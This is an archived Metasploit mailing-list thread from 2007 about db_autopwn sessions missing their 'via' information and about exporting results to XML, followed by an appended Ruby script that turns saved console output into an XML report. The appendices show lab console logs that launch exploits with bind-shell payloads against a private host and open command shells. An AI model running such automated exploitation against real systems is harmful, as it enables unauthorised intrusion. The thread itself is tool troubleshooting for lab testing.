Metasploit mailing list archives
Autopwn question [+generating Reports]
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 7 Feb 2007 20:37:08 -0800
The via exploit not being set is most likely a bug. I'll try to look into that. It should be set in all contexts. At present, I don't think we have a method to serialize the contents of the database to XML. We had talked about doing this at one point, though. As far as I'm aware, the global datastore will not be consulted for automated attacks from db_autopwn. I think only exploits with default targets will function correctly. HD can correct me if I'm wrong.

On Wed, Feb 07, 2007 at 11:12:42PM +0100, Dennis Günnewig wrote:
Hi skape,

I played around with db_autopwn until today and was faced with quite strange behaviour. The way you described works quite fine.

short:
======
  use <exploit>
  set <variable>
  exploit -z
  sessions -l -v

long:
=====
  appendix [1]

But if I do it the following way, the via information is missing.

short:
======
  load db_mysql
  db_connect user:password at localhost/msf1
  db_autopwn -e -p
  sessions -l -v

long:
=====
  appendix [2]

I got only

  Id  Description    Tunnel                                      Via
  --  -----------    ------                                      ---
  1   Command shell  192.168.111.1:3304 -> 192.168.111.12:7465
  2   Command shell  192.168.111.1:2911 -> 192.168.111.12:7308

Is this a built-in barrier against script kiddies or actually unwanted behaviour? I searched for helpful files with strace ("strace -p <pid> (-e trace=file) -o ./strace_file.out /metasploit/msfconsole" + "msf> sessions -l -v") and lsof (lsof | grep /metas), but didn't find anything suitable. While searching the API documentation for suitable variables, I found set_via(), but without any working Ruby IDE and running out of time for my semester thesis I decided to ask the mailing list.

===

Furthermore, are there any interfaces to take the output (scanned host(s), the scanned ports, the exploits which were able to create sessions, the time the systems were scanned etc.) to generate an XML report? And what do you think, how much time would it take a programmer who is familiar with Ruby and the msf to get such an extension of the msf working?

===

Another strange behaviour I found when starting db_autopwn -e -p: setting TARGET to 3 seems not to have any effect on exploits executed by db_autopwn. Is this a problem between my ears ;), a wanted feature, or to be led back to the beta status of the msf?

Maybe it would be better to allow TARGET to be a normal string or an integer, as Windows XP SP1 Eng can be a "2" in the context of one exploit (see [3]) and a "3" in another (see [4]).

Best regards,
dennis

Appendix:

(1)===============================================
==================================================
  msf> use windows/tftp/tftpd32_long_filename
  msf exploit(tftpd32_long_filename)> set

  Global
  ======

    Name     Value
    ----     -----
    PAYLOAD  windows/shell/bind_tcp
    RHOST    192.168.111.12
    RPORT    69

  Module: windows/tftp/tftpd32_long_filename
  ==========================================

    Name      Value
    ----      -----
    EXITFUNC  process
    RPORT     69
    TARGET    3
    WfsDelay  0

  msf exploit(tftpd32_long_filename)> exploit -z
  [...]
  msf exploit(tftpd32_long_filename)> sessions -l -v
  or
  msf > sessions -l -v

  Active sessions
  ===============

    Id  Description    Tunnel                                      Via
    --  -----------    ------                                      ---
    1   Command shell  192.168.111.1:1502 -> 192.168.111.12:4444  windows/tftp/tftpd32_long_filename

(2)===============================================
==================================================
  msf > load db_mysql
  [*] Successfully loaded plugin: db_mysql
  msf > db_connect user:password at localhost/msf1
  msf > db_hosts
  [*] Host: 192.168.111.12
  msf > db_services
  [*] Service: host=192.168.111.12 port=22 proto=tcp state=up name=ssh
  [*] Service: host=192.168.111.12 port=135 proto=tcp state=up name=msrpc
  [*] Service: host=192.168.111.12 port=139 proto=tcp state=up name=netbios-ssn
  [*] Service: host=192.168.111.12 port=445 proto=tcp state=up name=microsoft-ds
  [*] Service: host=192.168.111.12 port=1025 proto=tcp state=up name=msrpc
  [*] Service: host=192.168.111.12 port=3389 proto=tcp state=up name=microsoft-rdp
  [*] Service: host=192.168.111.12 port=5000 proto=tcp state=up name=upnp
  [*] Service: host=192.168.111.12 port=5800 proto=tcp state=up name=vnc-http
  [*] Service: host=192.168.111.12 port=5900 proto=tcp state=up name=vnc
  [*] Service: host=192.168.111.12 port=123 proto=udp state=up name=ntp
  [*] Service: host=192.168.111.12 port=135 proto=udp state=up name=msrpc
  msf > db_add_
  db_add_host  db_add_port
  msf > db_add_port
  [*] Usage: db_add_port [host] [port] [proto]
  msf > db_add_port 192.168.111.12 69 udp
  [*] Service: host=192.168.111.12 port=69 proto=udp state=up

  msf > setg TARGET 3
  TARGET => 3
  msf > setg

  Global
  ======

    Name     Value
    ----     -----
    PAYLOAD  windows/shell/bind_tcp
    RHOST    192.168.111.12
    RHOSTS   192.168.111.0/24
    RPORT    69
    TARGET   3

  msf > db_autopwn -e -p
  [*] Launching exploit/windows/tftp/tftpd32_long_filename (4/76) against 192.168.111.12:69...
  [*] >> Exception during launch from exploit/windows/tftp/tftpd32_long_filename: A target has not been selected.
  [*] Launching exploit/windows/smb/ms06_066_nwwks (6/76) against 192.168.111.12:445...
  [*] Started bind handler
  [*] Connecting to the SMB service...
  [*] Binding to e67ab081-9844-3521-9d32-834f038001c0:1.0 at ncacn_np:192.168.111.12[\nwwks] ...
  [*] Launching exploit/windows/tftp/threectftpsvc_long_mode (15/76) against 192.168.111.12:69...
  [*] Started bind handler
  [*] Trying target 3CTftpSvc 2.0.1...
  [*] Launching exploit/windows/ssl/ms04_011_pct (17/76) against 192.168.111.12:69...
  [*] Started bind handler

  [...]

  msf > sessions -l -v

  Active sessions
  ===============

    Id  Description    Tunnel                                      Via
    --  -----------    ------                                      ---
    1   Command shell  192.168.111.1:3304 -> 192.168.111.12:7465
    2   Command shell  192.168.111.1:2911 -> 192.168.111.12:7308

(3)===============================================
==================================================
  msf exploit(freesshd_key_exchange) > show targets

  Exploit targets:

    Id  Name
    --  ----
    0   Windows 2000 Pro SP4 English
    1   Windows XP Pro SP0 English
    2   Windows XP Pro SP1 English

(4)===============================================
==================================================
  msf exploit(tftpd32_long_filename) > show targets

  Exploit targets:

    Id  Name
    --  ----
    0   Windows NT 4.0 SP6a English
    1   Windows 2000 Pro SP4 English
    2   Windows XP Pro SP0 English
    3   Windows XP Pro SP1 English
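Dennis asks whether there is an interface for turning the scanned hosts, ports, resulting sessions and scan time into an XML report, and skape's reply says the database has no XML serializer yet. As an added example that is not part of this thread and not Metasploit's own code, the Ruby script below does the cheap version from outside the framework: it parses the console text of the kind shown in appendix (2) (db_hosts and db_services lines, the "sessions -l -v" table, and "A target has not been selected" launch failures) and emits an XML report. The line formats are the 2007-era ones quoted in the thread; the element and attribute names and the embedded sample text are my own construction.

```ruby
# Added example (not from the thread or from Metasploit): build an XML report
# from saved msfconsole output. Standard library only.

HOST_RE    = /^\[\*\] Host: (\S+)/
SERVICE_RE = /^\[\*\] Service: host=(\S+) port=(\d+) proto=(\S+) state=(\S+)(?: name=(\S+))?/
FAILURE_RE = /^\[\*\] >> Exception during launch from (\S+): (.+?)\s*$/
# Session rows look like "<id>  <description>  <local> -> <remote>  [<via>]".
# The via column is optional because, as the thread shows, it is sometimes empty.
SESSION_RE = /^\s*(\d+)\s+(.+?)\s{2,}(\S+) -> (\S+)(?:\s+(\S+))?\s*$/

# Constructed sample in the formats quoted in the thread (not a real capture).
SAMPLE_OUTPUT = <<~'TXT'
  [*] Host: 192.168.111.12
  [*] Service: host=192.168.111.12 port=22 proto=tcp state=up name=ssh
  [*] Service: host=192.168.111.12 port=445 proto=tcp state=up name=microsoft-ds
  [*] Service: host=192.168.111.12 port=69 proto=udp state=up
  [*] Launching exploit/windows/tftp/tftpd32_long_filename (4/76) against 192.168.111.12:69...
  [*] >> Exception during launch from exploit/windows/tftp/tftpd32_long_filename: A target has not been selected.

  Active sessions
  ===============

    Id  Description    Tunnel                                      Via
    --  -----------    ------                                      ---
    1   Command shell  192.168.111.1:3304 -> 192.168.111.12:7465  windows/tftp/tftpd32_long_filename
    2   Command shell  192.168.111.1:2911 -> 192.168.111.12:7308
TXT

# Parse the console text into hosts, services, sessions and launch failures.
def parse_msf_output(text)
  report = { hosts: [], services: [], sessions: [], failures: [] }
  text.each_line do |line|
    if (m = HOST_RE.match(line))
      report[:hosts] << m[1]
    elsif (m = SERVICE_RE.match(line))
      report[:services] << { host: m[1], port: m[2].to_i, proto: m[3], state: m[4], name: m[5] }
    elsif (m = FAILURE_RE.match(line))
      report[:failures] << { exploit: m[1], reason: m[2] }
    elsif (m = SESSION_RE.match(line))
      report[:sessions] << { id: m[1].to_i, desc: m[2], local: m[3], remote: m[4], via: m[5] }
    end
  end
  # A host that only ever appears in service lines is still a host.
  report[:hosts] = (report[:hosts] + report[:services].map { |s| s[:host] }).uniq
  report
end

# Escape text for use inside an XML attribute value.
def xml_escape(value)
  value.to_s.gsub('&', '&amp;').gsub('<', '&lt;').gsub('>', '&gt;').gsub('"', '&quot;')
end

# Render a hash as XML attributes, skipping nil values (e.g. a missing via).
def attrs(pairs)
  pairs.reject { |_, v| v.nil? }.map { |k, v| %(#{k}="#{xml_escape(v)}") }.join(' ')
end

# Serialize the parsed report; element names are this example's own choice.
def to_xml(report, scanned_at:)
  lines = ['<?xml version="1.0" encoding="UTF-8"?>',
           "<msfreport #{attrs(scanned_at: scanned_at)}>"]
  report[:hosts].each do |host|
    lines << "  <host #{attrs(address: host)}>"
    report[:services].select { |s| s[:host] == host }.each do |s|
      lines << "    <service #{attrs(port: s[:port], proto: s[:proto], state: s[:state], name: s[:name])}/>"
    end
    lines << '  </host>'
  end
  report[:sessions].each do |s|
    lines << "  <session #{attrs(id: s[:id], type: s[:desc], local: s[:local], remote: s[:remote], via: s[:via])}/>"
  end
  report[:failures].each do |f|
    lines << "  <launch_failure #{attrs(exploit: f[:exploit], reason: f[:reason])}/>"
  end
  lines << '</msfreport>'
  lines.join("\n") + "\n"
end

if $PROGRAM_NAME == __FILE__
  # With a saved console log as argument, report on it; otherwise use the sample.
  text = ARGV.empty? ? SAMPLE_OUTPUT : ARGF.read
  puts to_xml(parse_msf_output(text), scanned_at: Time.now.utc.strftime('%Y-%m-%dT%H:%M:%SZ'))
end
```

Run it with a saved console transcript as its argument (or without one to see the embedded sample). A session whose via column is empty, which is the bug skape refers to above, comes out as a session element with no via attribute, so the gap is visible in the report rather than silently lost; the launch_failure elements likewise record which modules never ran because no target was selected.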